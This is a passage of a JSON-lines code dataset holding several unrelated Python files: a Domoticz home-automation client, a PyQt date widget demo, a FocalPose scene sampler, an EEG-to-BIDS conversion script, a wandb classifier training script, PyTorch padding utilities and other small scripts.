here, people are interested in seeing the plots first\n # to see whether something happened or not\n plotters = [\n tre_d_plotter(\n input_folder, output_folder, output_file, force_flag, three_display_flag\n ),\n two_d_plotter(\n input_folder, output_folder, output_file, force_flag, two_display_flag\n ),\n ]\n\n # pylint: disable=expression-not-assigned\n if not animate_flag:\n [plotter.process() for plotter in plotters]\n elif force_flag and animate_flag:\n [plotter.process() for plotter in plotters]\n [plotter.animate() for plotter in plotters]\n else:\n # Assume images have been done at output folder, you can just animate them now\n [plotter.animate() for plotter in plotters]\n # pylint: enable=expression-not-assigned\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"mattialab/elastica","sub_path":"scripts/plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":56426,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"} +{"seq_id":"23138109282","text":"# -*- coding: latin-1 -*-\n'''\n@author: 2017 jingl3s at yopmail dot com\n'''\n\n# license\n# \n# This code is free software; you can redistribute it and/or modify it\n# under the terms of the DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE (see the file\n# LICENSE included with the distribution).\n\nimport requests\nimport logging\nimport json\n\n\nclass Domoticz(object):\n '''\n Permet d'envoyer des commandes au serveur Domoticz\n '''\n\n def __init__(self):\n '''\n\n '''\n self._logger = logging.getLogger(self.__class__.__name__)\n self._adresse = None\n self._url_lit = None\n self._url_cmd_domoticz = None\n self._requete_val = None\n\n def set_adresse(self, adresse):\n self._adresse = adresse\n\n def set_url_lecture(self, url_lecture):\n self._url_lit = url_lecture\n\n def modifier_interrupteur(self, idx_capteur, interrupteur_demande, chaine_valeur_inter, url_ecrit):\n '''\n Modifie la position d'un interrupteur seulement si celui-ci n'est pas déja dans la position\n :param idx_capteur:\n :param interrupteur_demande:\n :param chaine_valeur_inter:\n :param url_ecrit:\n '''\n self._verifier_entree()\n\n self._domoticz_commande_selecteur(\n idx_capteur, interrupteur_demande, chaine_valeur_inter, url_ecrit)\n\n\n def lit_information_capteur(self, idx_capteur):\n # recuperation de la valeur\n self._mise_a_jour_url_lit_capteur(idx_capteur)\n self._requete_val = self._domoticz_requete()\n self._last_idx = idx_capteur\n\n\n def lit_valeur(self, idx_capteur, chaine_valeur_inter):\n if self._last_idx != idx_capteur:\n self.lit_information_capteur(idx_capteur)\n \n # recuperation de la valeur\n valeur_interrupteur = self._domoticz_val_inter(\n self._requete_val, idx_capteur, chaine_valeur_inter)\n return valeur_interrupteur\n\n\n def _verifier_entree(self):\n if self._adresse is None:\n raise ValueError(\"Propriete adresse non definie.\")\n if self._url_lit is None:\n raise ValueError(\n \"Propriete information complement url pour information non definie.\")\n\n def _mise_a_jour_url_lit_capteur(self, idx_capteur):\n self._url_domoticz = self._adresse + \\\n self._url_lit + idx_capteur\n\n def _mise_a_jour_url_ecrit_capteur(self, url_cmd, valeur):\n self._url_domoticz = self._adresse + \\\n url_cmd + valeur\n\n def _domoticz_val_inter(self, json_resultat_requete, idx_capteur, str_json_champ):\n '''\n Renvoi la valeur d'un catpeur ou None si le capteur n'est pas trouvé dans la réponse\n :param json_resultat_requete:\n :param idx_capteur:\n :param str_json_champ:\n '''\n\n valeur = None\n capteur_trouve = False\n if json_resultat_requete is not None:\n try:\n if json_resultat_requete[\"status\"] == \"OK\":\n for i, _ in enumerate(json_resultat_requete[\"result\"]):\n if json_resultat_requete[\"result\"][i][\"idx\"] == str(idx_capteur):\n capteur_trouve = True\n # Level correspond à la valeur du selecteur dans\n # domoticz\n valeur = json_resultat_requete[\n \"result\"][0][str_json_champ]\n except Exception as e:\n self._logger.error(\n \"Erreur lecture information domoticz, execution continue\" + str(e))\n\n if not capteur_trouve:\n self._logger.debug(\"Domoticz serveur ou Capteur non répondus.\")\n\n return valeur\n\n def _domoticz_requete(self):\n '''\n @return: json structure de la réponse si OK pour le status\n Sinon retourne None\n '''\n json_object = None\n try:\n response = requests.get(self._url_domoticz)\n json_object = json.loads(response.text)\n if json_object[\"status\"] != \"OK\":\n self._logger.error(\"Cmd URL a echoué. cmd : '{}', reponse : '{}'\".format(\n json_object, self._url_cmd_domoticz))\n json_object = None\n except Exception as e:\n raise Exception(e)\n return json_object\n\n def _domoticz_commande_selecteur(self, idx_capteur, interrupteur_demande, chaine_valeur_inter, url_ecrit):\n\n # recuperation de la valeur\n self._mise_a_jour_url_lit_capteur(idx_capteur)\n requete_val = self._domoticz_requete()\n valeur_interrupteur = self._domoticz_val_inter(\n requete_val, idx_capteur, chaine_valeur_inter)\n\n # Positionnement de l'interrupteur si besoin seulement\n if str(valeur_interrupteur) != interrupteur_demande:\n self._logger.debug(\n \"Positionnement de l'interrupteur a : {}\".format(interrupteur_demande))\n self._mise_a_jour_url_ecrit_capteur(\n url_ecrit, interrupteur_demande)\n self._domoticz_requete()\n else:\n self._logger.debug(\"Aucun changement interrupteur\")\n","repo_name":"jingl3s/domoticz_hydroquebec","sub_path":"domoticz/domoticz.py","file_name":"domoticz.py","file_ext":"py","file_size_in_byte":5176,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6224914512","text":"from PyQt5.Qt import *\n\nclass Window(QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"QDateTimeEdit的学习\")\n self.resize(500, 500)\n self.setup_ui()\n\n def setup_ui(self):\n dte = QDateTimeEdit(self)\n # dte = QDateTimeEdit(QDateTime.currentDateTime(), self) # 获取当前时间日期\n # dte = QDateTimeEdit(QDate.currentDate(), self) # 获取当前日期\n # dte = QDateTimeEdit(QTime.currentTime(), self) # 获取当前时间\n dte.move(100, 100)\n\n dte.setDisplayFormat(\"yyyy-MM-dd HH: mm: ss\") # 设置显示格式\n\n btn = QPushButton(self)\n btn.move(200, 200)\n btn.setText(\"测试\")\n # btn.clicked.connect(lambda :print(dte.currentSectionIndex()))\n def test():\n # print(\"xxx\")\n # dte.setFocus()\n # dte.setCurrentSectionIndex(3) # 设置当前选中的部分\n # dte.setCurrentSection(QDateTimeEdit.DaySection) # 设置当前选中的部分\n # print(dte.sectionText(QDateTimeEdit.DaySection)) # 获取当前选中部分的文本\n # dte.setMaximumDateTime(QDateTime(2020, 8, 15, 12, 30)) # 设置最大时间\n #\n # dte.setMinimumDateTime(QDateTime.currentDateTime())\n\n # dte.setDateTimeRange(QDateTime.currentDateTime().addDays(-3), QDateTime.currentDateTime().addDays(3)) # 设置时间范围\n # print(dte.dateTime()) # 获取日期时间\n print(dte.date()) # 获取日期\n print(dte.time()) # 获取时间\n\n btn.clicked.connect(test)\n print(dte.sectionCount())\n dte.setCalendarPopup(True) # 设置日历弹出\n\n dte.dateTimeChanged.connect(lambda val:print(val))\n dte.dateChanged.connect(lambda val: print(\"日期发生改变\", val))\n dte.timeChanged.connect(lambda val: print(\"时间发生改变\", val))\n\n\n\nif __name__ == '__main__':\n import sys\n app = QApplication(sys.argv)\n\n window = Window()\n window.show()\n\n\n sys.exit(app.exec_())","repo_name":"ywkangkai/PythonGUI","sub_path":"GUI/时间控件/QDateTimeEdit/21-QDateTimeEdit-功能测试.py","file_name":"21-QDateTimeEdit-功能测试.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72966081475","text":"import numpy as np\nimport pinocchio as pin\nfrom scipy.spatial.transform import Rotation\n\nfrom focalpose.simulator import Camera\nfrom focalpose.recording.bop_recording_scene import BopRecordingScene, SamplerError\nfrom focalpose.config import LOCAL_DATA_DIR\nfrom focalpose.datasets.real_dataset import Pix3DDataset, CompCars3DDataset, StanfordCars3DDataset\nfrom focalpose.fitting.nonparametric_model import NonparametricModel\nfrom focalpose.fitting.fitting import get_outliers\n\nTOP,LEFT,BOTTOM,RIGHT=range(4)\n\nclass BopRecordingSceneNonparametric(BopRecordingScene):\n def __init__(self,\n deltas=None,\n outliers = 0.05,\n nonparam_q=0.95,\n soft_border_check_enlargement=2,\n soft_border_check_treshold=0.50,\n area_check=0.03,\n\n urdf_ds='ycbv',\n texture_ds='shapenet',\n domain_randomization=True,\n background_textures=False,\n textures_on_objects=False,\n n_objects_interval=(1, 1),\n #objects_xyz_interval=((0.0, -0.5, -0.15), (1.0, 0.5, 0.15)),\n proba_falling=0.0,\n resolution=(640, 480),\n #focal_interval=(515, 515),\n #camera_distance_interval=(0.5, 1.5),\n border_check=False,\n gpu_renderer=True,\n n_textures_cache=50,\n seed=0):\n\n super().__init__(\n urdf_ds=urdf_ds,\n texture_ds=texture_ds,\n domain_randomization=domain_randomization,\n background_textures=background_textures,\n textures_on_objects=textures_on_objects,\n n_objects_interval=n_objects_interval,\n #objects_xyz_interval=objects_xyz_interval,\n proba_falling=proba_falling,\n resolution=resolution,\n #focal_interval=focal_interval,\n #camera_distance_interval=camera_distance_interval,\n border_check=border_check,\n gpu_renderer=gpu_renderer,\n n_textures_cache=n_textures_cache,\n seed=seed)\n\n assert (not soft_border_check_enlargement and not soft_border_check_treshold) or \\\n (soft_border_check_enlargement > 1 and soft_border_check_treshold >= 0 and soft_border_check_treshold <= 1)\n\n self.soft_border_check_enlargement = soft_border_check_enlargement\n self.soft_border_check_treshold = soft_border_check_treshold\n self.area_check=area_check\n \n if urdf_ds == 'pix3d-sofa':\n self.real_dataset = Pix3DDataset(LOCAL_DATA_DIR / 'pix3d', 'sofa')\n elif urdf_ds == 'pix3d-bed':\n self.real_dataset = Pix3DDataset(LOCAL_DATA_DIR / 'pix3d', 'bed')\n elif urdf_ds == 'pix3d-table':\n self.real_dataset = Pix3DDataset(LOCAL_DATA_DIR / 'pix3d', 'table')\n elif 'pix3d-chair' in urdf_ds:\n self.real_dataset = Pix3DDataset(LOCAL_DATA_DIR / 'pix3d', 'chair')\n elif 'stanfordcars' in urdf_ds:\n self.real_dataset = StanfordCars3DDataset(LOCAL_DATA_DIR / 'StanfordCars')\n elif 'compcars' in urdf_ds:\n self.real_dataset = CompCars3DDataset(LOCAL_DATA_DIR / 'CompCars')\n\n if outliers > 0:\n t = self.real_dataset.TCO[:,:3,3]\n zf = np.vstack([t[:,2], self.real_dataset.f]).T\n self.real_dataset.index = self.real_dataset.index.drop(get_outliers(zf, outliers))\n\n if deltas is None:\n self.nonparametric_model = NonparametricModel.fit(self.real_dataset, nonparam_q)\n else:\n self.nonparametric_model = NonparametricModel(\n self.real_dataset,\n deltas['R'],\n deltas['x'],\n deltas['y'],\n deltas['z'],\n deltas['f'])\n\n def sample_camera(self):\n TWC,f = self.sample_TWC_f()\n return self.create_camera(TWC,f)\n\n def sample_TWC_f(self):\n R,t,f = self.nonparametric_model.sample()\n Rt = np.hstack([R,t.reshape(-1,1)])\n TWC = np.vstack([ Rt , [0,0,0,1] ])\n return TWC,f\n\n def create_camera(self, TWC, f, enlargement_factor=1):\n K = np.zeros((3, 3), dtype=np.float)\n W, H = max(self.resolution), min(self.resolution)\n K[0, 0] = f\n K[1, 1] = f\n K[0, 2] = W / 2 * enlargement_factor\n K[1, 2] = H / 2 * enlargement_factor\n K[2, 2] = 1.0\n cam = Camera(resolution=self.resolution, client_id=self._client_id)\n h,w = self.resolution\n cam.set_intrinsic_K(K, h=h*enlargement_factor, w=w*enlargement_factor)\n cam.set_extrinsic_T(TWC)\n return cam\n\n @staticmethod\n def check_area(uniqs, cam_obs, q):\n mask = cam_obs['mask']\n for uniq in uniqs[uniqs > 0]:\n ids = np.where(mask == uniq)\n bbox_area = (ids[0].max()-ids[0].min()) * (ids[1].max()-ids[1].min())\n if bbox_area / (mask.shape[0]*mask.shape[1]) < q:\n return False\n return True\n\n @staticmethod\n def intersection_area(a, b):\n intersection = (\n max(a[TOP], b[TOP]),\n max(a[LEFT], b[LEFT]),\n min(a[BOTTOM], b[BOTTOM]),\n min(a[RIGHT], b[RIGHT]))\n\n if intersection[LEFT] < intersection[RIGHT] and intersection[TOP] < intersection[BOTTOM]:\n return (intersection[BOTTOM]-intersection[TOP])*(intersection[RIGHT]-intersection[LEFT])\n else:\n return 0\n\n @staticmethod\n def check_border_soft(uniqs, cam_obs, resolution, q, treshold):\n mask = cam_obs['mask']\n h,w = resolution\n img_h = h/q\n img_w = w/q\n padding_h = (h - img_h)/2\n padding_w = (w - img_w)/2\n img_bbox = (padding_h, padding_w, padding_h+img_h, padding_w+img_w)\n\n for uniq in uniqs[uniqs > 0]:\n ids = np.where(mask == uniq)\n object_bbox = (ids[0].min(), ids[1].min(), ids[0].max(), ids[1].max())\n object_area = (object_bbox[BOTTOM]-object_bbox[TOP])*(object_bbox[RIGHT]-object_bbox[LEFT])\n intersection_area = BopRecordingSceneNonparametric.intersection_area(img_bbox, object_bbox)\n\n if intersection_area / object_area < treshold:\n return False\n \n return True\n\n\n def camera_rand(self):\n N = 0\n valid = False\n self.cam_obs = None\n\n while not valid:\n N += 1\n if N > 3:\n raise SamplerError('Cannot sample valid camera configuration.')\n \n TWC,f = self.sample_TWC_f()\n cam = self.create_camera(TWC, f, enlargement_factor=self.soft_border_check_enlargement)\n cam_obs_ = cam.get_state()\n mask = cam_obs_['mask']\n mask[mask == self.background._body_id] = 0\n mask[mask == 255] = 0\n uniqs = np.unique(cam_obs_['mask'])\n\n \n valid = len(uniqs) == len(self.bodies) + 1 and np.sum(mask) > 0\n if not valid: continue\n \n if self.soft_border_check_enlargement and not self.border_check:\n # check that object is inside enlarged image and that image contains big enough portion of object's bbox\n valid = self.check_border(uniqs, cam_obs_) and self.check_border_soft(uniqs, cam_obs_, \n self.resolution,\n self.soft_border_check_enlargement,\n self.soft_border_check_treshold)\n if not valid: continue\n \n if self.soft_border_check_enlargement != 1:\n cam = self.create_camera(TWC, f, enlargement_factor=1)\n cam_obs_ = cam.get_state()\n mask = cam_obs_['mask']\n mask[mask == self.background._body_id] = 0\n mask[mask == 255] = 0\n uniqs = np.unique(cam_obs_['mask'])\n valid = len(uniqs) == len(self.bodies) + 1 and np.sum(mask) > 0\n if not valid: continue\n\n if self.border_check and not self.soft_border_check_enlargement:\n valid = self.check_border(uniqs, cam_obs_)\n if not valid: continue\n\n if self.area_check:\n valid = self.check_area(uniqs, cam_obs_, self.area_check)\n \n self.cam_obs = cam_obs_\n \n \n \n def objects_pos_orn_rand(self):\n self.hide_plane()\n for body in self.bodies:\n pos = np.zeros(3)\n orn = pin.Quaternion().coeffs()\n body.pose = pos, orn\n","repo_name":"cifkam/FocalPosePP","sub_path":"focalpose/recording/bop_recording_scene_nonparametric.py","file_name":"bop_recording_scene_nonparametric.py","file_ext":"py","file_size_in_byte":8630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18039359476","text":"# real data consumer\nfrom real import getData\n\nlocalData = [10,20,30]\ndata = getData()\n\nsum = localData[0] + localData[1] + localData[2]\n\nanswer = input('should include external data (y/n) ? ')\n\nif answer == 'y':\n sum += data[0]\n\nprint(sum) \n","repo_name":"soft7it/Django","sub_path":"patern/proxy_patern/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12660362848","text":"from os.path import basename\nfrom tempfile import NamedTemporaryFile\n\nimport argparse\nimport pandas as pd\nfrom tqdm import tqdm\nimport mne\nfrom mne_bids import BIDSPath, read_raw_bids, write_raw_bids\n\nfrom braindecode.datasets.sleep_physionet import SleepPhysionet\nfrom mne.datasets.sleep_physionet.age import fetch_data\n\n\ndef preprocess_and_save(\n raw_path_pair,\n preproc_bids_path,\n l_freq,\n h_freq,\n sfreq,\n to_microvolt=True,\n channels_to_keep=None,\n remove_ch_ref=False,\n crop_wake_mins=30,\n load_eeg_only=False\n):\n raw, desc = SleepPhysionet._load_raw(\n raw_path_pair[0], raw_path_pair[1], preload=True,\n load_eeg_only=load_eeg_only, crop_wake_mins=crop_wake_mins)\n # Preprocessing\n if to_microvolt:\n raw.apply_function(lambda x: x * 1e6, channel_wise=False, verbose=False)\n if channels_to_keep is not None:\n raw.pick_channels(channels_to_keep)\n if sfreq != raw.info['sfreq']:\n raw.resample(sfreq=sfreq, npad='auto', verbose=False)\n raw.filter(l_freq=l_freq, h_freq=h_freq, verbose=False)\n if remove_ch_ref:\n mapping = {name: name.split('-')[0] for name in raw.info['ch_names']}\n mne.rename_channels(raw.info, mapping)\n\n # Write new BIDS\n\n # Work around a limitation of MNE-BIDS: It won't allow us to save the\n # pre-loaded raw data to BIDS directly; so we're going to write the\n # data to a temporary file, which we are then going to pass to MNE-BIDS\n # for storage.\n # Use `_raw.fif` suffix to avoid MNE warnings.\n with NamedTemporaryFile(suffix='_raw.fif') as f:\n fname = f.name\n raw.save(fname, overwrite=True, verbose=False)\n raw = mne.io.read_raw_fif(fname, preload=False, verbose=False)\n write_raw_bids(raw, preproc_bids_path, overwrite=True, verbose=False)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Preprocess and save physionet sleep edf into bids.'\n )\n\n parser.add_argument(\n 'destination',\n type=str,\n help='Directory to use as root for the bids files created.'\n )\n\n args = parser.parse_args()\n\n preproc_bids_root = args.destination\n\n l_freq, h_freq = None, 30\n sfreq = 100\n for subject_id in tqdm(range(49, 83)):\n for recording_id in [1, 2]:\n try:\n path_pair = fetch_data(subjects=[subject_id], recording=[recording_id], on_missing='warn', verbose=False)[0]\n subject = basename(path_pair[0]).split('-')[0][:5]\n session = basename(path_pair[1]).split('-')[0][5:]\n preproc_bids_path = BIDSPath(\n subject=subject,\n session=session,\n root=preproc_bids_root,\n suffix='eeg',\n datatype='eeg'\n )\n preprocess_and_save(path_pair, preproc_bids_path, l_freq, h_freq, sfreq)\n except (IndexError, ValueError):\n print('error')","repo_name":"msolal/BT-sleep-EEG","sub_path":"converting_to_bids/sleep_physionet_to_bids.py","file_name":"sleep_physionet_to_bids.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7347306190","text":"def solution(n, words):\n count = 1\n man = 1\n last = words[0][0]\n dic = dict()\n for word in words:\n if word in dic or last != word[0]:\n return [man, count]\n dic[word] = 1\n man += 1\n last = word[-1]\n if man > n:\n man = 1\n count += 1\n return [0,0]","repo_name":"soulchicken/crush-programmers-cote","sub_path":"Python/Level_2/10_영어 끝말잇기.py","file_name":"10_영어 끝말잇기.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25551706278","text":"\"\"\"\nMade with love by tcapelle\n@wandbcode{pis_course}\n\"\"\"\n\nimport argparse\nfrom types import SimpleNamespace\nfrom fastprogress import progress_bar\nimport timm\nimport wandb\nimport torch\nfrom torch import nn\nfrom torch.optim import AdamW\nfrom torch.optim.lr_scheduler import OneCycleLR\nfrom torch.utils.data import DataLoader\nimport torchvision.transforms as T\nfrom torcheval.metrics import (\n BinaryAccuracy,\n BinaryF1Score,\n BinaryPrecision,\n BinaryRecall,\n Mean,\n)\nfrom utils import (\n get_data,\n ImageDataset,\n set_seed,\n to_device,\n save_model,\n log_model_preds,\n get_class_name_in_snake_case as snake_case,\n)\nimport params\n\n# Set the default configuration parameters for the experiment\ndefault_cfg = SimpleNamespace(\n image_size=256, # Image size\n batch_size=16, # Batch size\n seed=42, # Random seed\n epochs=10, # Number of training epochs\n learning_rate=2e-3, # Learning rate\n weight_decay=1e-5, # Weight decay\n model_arch=\"resnet18\", # Timm backbone architecture\n log_model=False, # Whether or not to log the model to Wandb\n log_preds=False, # Whether or not to log the model predictions to Wandb\n # these are params that are not being changed\n image_column=\"file_name\", # The name of the column containing the image file names\n target_column=\"mold\", # The name of the column containing the target variable\n PROJECT_NAME=params.PROJECT_NAME, # The name of the Wandb project\n ENTITY=params.ENTITY, # The Wandb username or organization name\n PROCESSED_DATA_AT=params.DATA_AT, # The path to the directory containing the preprocessed data\n)\n\n# Define the image data transformations\ntransforms = {\n \"train\": [T.Resize(default_cfg.image_size), T.ToTensor(), T.RandomHorizontalFlip()],\n \"valid\": [T.Resize(default_cfg.image_size), T.ToTensor()],\n}\n\n# Override the default configuration parameters with any command-line arguments\ndef parse_args(default_cfg):\n \"Overriding default argments\"\n parser = argparse.ArgumentParser(description=\"Process hyper-parameters\")\n parser.add_argument(\"--image_size\", type=int, default=default_cfg.image_size, help=\"image size\")\n parser.add_argument(\"--batch_size\", type=int, default=default_cfg.batch_size, help=\"batch size\")\n parser.add_argument(\"--seed\", type=int, default=default_cfg.seed, help=\"random seed\")\n parser.add_argument(\"--epochs\",type=int,default=default_cfg.epochs, help=\"number of training epochs\")\n parser.add_argument(\"--learning_rate\", type=float, default=default_cfg.learning_rate, help=\"learning rate\")\n parser.add_argument(\"--weight_decay\", type=float, default=default_cfg.weight_decay, help=\"weight decay\")\n parser.add_argument(\"--model_arch\", type=str, default=default_cfg.model_arch, help=\"timm backbone architecture\")\n parser.add_argument(\"--log_model\", action=\"store_true\", help=\"log model to wandb\")\n parser.add_argument(\n \"--log_preds\", action=\"store_true\", help=\"log model predictions to wandb\"\n )\n args = vars(parser.parse_args())\n\n # update config with parsed args\n for k, v in args.items():\n setattr(default_cfg, k, v)\n\n# Define the ClassificationTrainer class for training the model\nclass ClassificationTrainer:\n \"\"\"\n A class for training a classification model. It is used to train a model \n on a training set and validate it on a validation set. This class is\n inspired by the Keras API.\n\n Args:\n train_dataloader (torch.utils.data.DataLoader): A PyTorch DataLoader for the training set\n valid_dataloader (torch.utils.data.DataLoader): A PyTorch DataLoader for the validation set\n model (torch.nn.Module): A PyTorch model\n metrics (list): A list of metrics to be used for training and validation, \n we are using torcheval.metrics\n device (str): The device to be used for training, either \"cpu\" or \"cuda\"\n \"\"\"\n def __init__(\n self, train_dataloader, valid_dataloader, model, metrics, device=\"cuda\"\n ):\n self.device = torch.device(device)\n self.model = model.to(self.device)\n self.train_dataloader = train_dataloader\n self.valid_dataloader = valid_dataloader\n self.train_metrics = [m(device=self.device) for m in metrics]\n self.valid_metrics = [m(device=self.device) for m in metrics]\n self.loss = Mean(device=device)\n\n def loss_func(self, x, y):\n \"A flattened version of nn.BCEWithLogitsLoss\"\n loss_func = nn.BCEWithLogitsLoss()\n return loss_func(x.squeeze(), y.squeeze().float())\n\n def compile(self, epochs=5, learning_rate=2e-3, weight_decay=0.01):\n \"Keras style compile method\"\n self.epochs = epochs\n self.optim = AdamW(self.model.parameters(), lr=learning_rate, weight_decay=weight_decay)\n self.schedule = OneCycleLR(\n self.optim,\n max_lr=learning_rate,\n pct_start=0.1,\n total_steps=epochs * len(self.train_dataloader),\n )\n\n def reset_metrics(self):\n \"Reset the metrics after each epoch\"\n self.loss.reset()\n for m in self.train_metrics:\n m.reset()\n for m in self.valid_metrics:\n m.reset()\n\n def train_step(self, loss):\n \"Perform a single training step\"\n self.optim.zero_grad()\n loss.backward()\n self.optim.step()\n self.schedule.step()\n return loss\n\n def one_epoch(self, train=True):\n \"Perform a single epoch of training or validation\"\n if train:\n self.model.train()\n dl = self.train_dataloader\n else:\n self.model.eval()\n dl = self.valid_dataloader\n pbar = progress_bar(dl, leave=False)\n preds = []\n for b in pbar:\n with torch.inference_mode() if not train else torch.enable_grad():\n images, labels = to_device(b, self.device)\n preds_b = self.model(images).squeeze()\n loss = self.loss_func(preds_b, labels)\n self.loss.update(loss)\n preds.append(preds_b)\n if train:\n self.train_step(loss)\n for m in self.train_metrics:\n m.update(preds_b, labels.long())\n wandb.log(\n {\n \"train_loss\": loss.item(),\n \"learning_rate\": self.schedule.get_last_lr()[0],\n }\n )\n else:\n for m in self.valid_metrics:\n m.update(preds_b, labels.long())\n pbar.comment = f\"train_loss={loss.item():2.3f}\"\n\n return torch.cat(preds, dim=0), self.loss.compute()\n\n def print_metrics(self, epoch, train_loss, val_loss):\n \"Print the metrics after each epoch\"\n print(f\"Epoch {epoch+1}/{self.epochs} - train_loss: {train_loss.item():2.3f} - val_loss: {val_loss.item():2.3f}\")\n\n # Fit the model\n def fit(self, log_preds=False):\n \"Fit the model for the specified number of epochs\"\n for epoch in progress_bar(range(self.epochs), total=self.epochs, leave=True):\n # train epoch\n _, train_loss = self.one_epoch(train=True)\n wandb.log({f\"train_{snake_case(m)}\": m.compute() for m in self.train_metrics})\n\n ## validation epoch\n val_preds, val_loss = self.one_epoch(train=False)\n wandb.log(\n {f\"valid_{snake_case(m)}\": m.compute() for m in self.valid_metrics},\n commit=False,\n )\n wandb.log({\"valid_loss\": val_loss.item()}, commit=False)\n self.print_metrics(epoch, train_loss, val_loss)\n self.reset_metrics()\n if log_preds:\n log_model_preds(self.valid_dataloader, val_preds)\n\n# Train the model with the specified configurations\ndef train(cfg):\n \"Train the model\"\n with wandb.init(\n project=cfg.PROJECT_NAME, entity=cfg.ENTITY, job_type=\"training\", config=cfg\n ):\n set_seed(cfg.seed)\n\n cfg = wandb.config\n df, processed_dataset_dir = get_data(cfg.PROCESSED_DATA_AT)\n\n # Create training and validation datasets\n train_ds = ImageDataset(\n df[~df.valid],\n processed_dataset_dir,\n image_column=cfg.image_column,\n target_column=cfg.target_column,\n transform=transforms[\"train\"],\n )\n\n valid_ds = ImageDataset(\n df[df.valid],\n processed_dataset_dir,\n image_column=cfg.image_column,\n target_column=cfg.target_column,\n transform=transforms[\"valid\"],\n )\n\n # Define training and validation dataloaders\n train_dataloader = DataLoader(\n train_ds, batch_size=cfg.batch_size, shuffle=True, pin_memory=True, num_workers=6\n )\n valid_dataloader = DataLoader(\n valid_ds, batch_size=cfg.batch_size, shuffle=False, num_workers=4\n )\n\n # Create the model using timm library. We will use a pretrained model.\n model = timm.create_model(cfg.model_arch, pretrained=True, num_classes=1)\n\n # Define the trainer object\n trainer = ClassificationTrainer(\n train_dataloader,\n valid_dataloader,\n model,\n metrics=[BinaryAccuracy, BinaryPrecision, BinaryRecall, BinaryF1Score],\n device=\"cuda\",\n )\n # Setup the optimizer and loss function\n trainer.compile(epochs=cfg.epochs, learning_rate=cfg.learning_rate, weight_decay=cfg.weight_decay)\n\n # Fit the model\n trainer.fit(log_preds=cfg.log_preds)\n if cfg.log_model:\n save_model(trainer.model, cfg.model_arch)\n\nif __name__ == \"__main__\":\n parse_args(default_cfg)\n train(default_cfg)\n","repo_name":"wandb/edu","sub_path":"pyimagesearch/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10088,"program_lang":"python","lang":"en","doc_type":"code","stars":310,"dataset":"github-code","pt":"61"} +{"seq_id":"36200192328","text":"from comet_ml import Experiment # Comet.ml can log training metrics, parameters, do version control and parameter optimization\nimport torch # PyTorch to create and apply deep learning models\nimport dask.dataframe as dd # Dask to handle big data in dataframes\nimport numpy as np # NumPy to handle numeric and NaN operations\nimport warnings # Print warnings for bad practices\nfrom . import utils # Generic and useful methods\nfrom . import search_explore # Methods to search and explore data\nfrom . import embedding # Embeddings and other categorical features handling methods\n\n# Ignore Dask's 'meta' warning\nwarnings.filterwarnings(\"ignore\", message=\"`meta` is not specified, inferred from partial data. Please provide `meta` if the result is unexpected.\")\n\n# Methods\n\ndef get_sequence_length_dict(df, id_column='subject_id', ts_column='ts'):\n '''Creates a dictionary with the original sequence lengths of a dataframe.\n\n Parameters\n ----------\n df : pandas.DataFrame or dask.DataFrame\n Data in a Pandas dataframe format which will be padded and converted\n to the requested data type.\n id_column : string or int, default 'subject_id'\n Name of the column which corresponds to the subject identifier in the\n dataframe.\n ts_column : string or int, default 'ts'\n Name of the column which corresponds to the timestamp in the\n dataframe.\n\n Returns\n -------\n seq_len_dict : dictionary, default None\n Dictionary containing the original sequence lengths of the dataframe.\n The keys should be the sequence identifiers (the numbers obtained from\n the id_column) and the values should be the length of each sequence.\n '''\n if isinstance(id_column, int) and isinstance(ts_column, int):\n # Convert the column indices to the column names\n column_names = list(df.columns)\n id_column = column_names[id_column]\n ts_column = column_names[ts_column]\n # Dictionary containing the sequence length (number of temporal events) of each sequence (patient)\n seq_len_df = df.groupby(id_column)[ts_column].count()\n seq_len_dict = dict([(idx, val) for idx, val in list(zip(seq_len_df.index, seq_len_df.to_numpy()))])\n return seq_len_dict\n\n\ndef dataframe_to_padded_tensor(df, seq_len_dict=None, id_column='subject_id',\n ts_column='ts', label_column='label',\n bool_feat=None, data_type='PyTorch',\n padding_value=999999, total_length=None,\n inplace=False):\n '''Converts a Pandas dataframe into a padded NumPy array or PyTorch Tensor.\n\n Parameters\n ----------\n df : pandas.DataFrame or dask.DataFrame\n Data in a Pandas dataframe format which will be padded and converted\n to the requested data type.\n seq_len_dict : dictionary, default None\n Dictionary containing the original sequence lengths of the dataframe.\n The keys should be the sequence identifiers (the numbers obtained from\n the id_column) and the values should be the length of each sequence.\n id_column : string, default 'subject_id'\n Name of the column which corresponds to the subject identifier in the\n dataframe.\n ts_column : string, default 'ts'\n Name of the column which corresponds to the timestamp in the\n dataframe.\n bool_feat : string or list of strings, default None\n Name(s) of the boolean feature(s) of the dataframe. In order to prevent\n confounding padding values with encodings, these features must have\n their padding values replaced with 0. If not specified, the method\n will automatically look for boolean columns in the dataframe. If you\n don't want any feature to be treated as a boolean dtype, set `bool_feat=[]`\n data_type : string, default 'PyTorch'\n Indication of what kind of output data type is desired. In case it's\n set as 'NumPy', the function outputs a NumPy array. If it's 'PyTorch',\n the function outputs a PyTorch tensor.\n padding_value : numeric\n Value to use in the padding, to fill the sequences.\n total_length : int, default None\n If not None, the output will be padded to have length total_length.\n This method will throw ValueError if total_length is less than the\n max sequence length in sequence.\n inplace : bool, default False\n If set to True, the original dataframe will be used and modified\n directly. Otherwise, a copy will be created and returned, without\n changing the original dataframe.\n\n Returns\n -------\n arr : torch.Tensor or 